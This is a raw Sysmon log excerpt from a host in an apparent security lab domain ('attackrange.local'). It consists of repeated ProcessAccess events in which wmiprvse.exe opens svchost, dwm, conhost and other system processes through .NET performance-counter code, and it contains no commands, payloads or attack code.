13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DL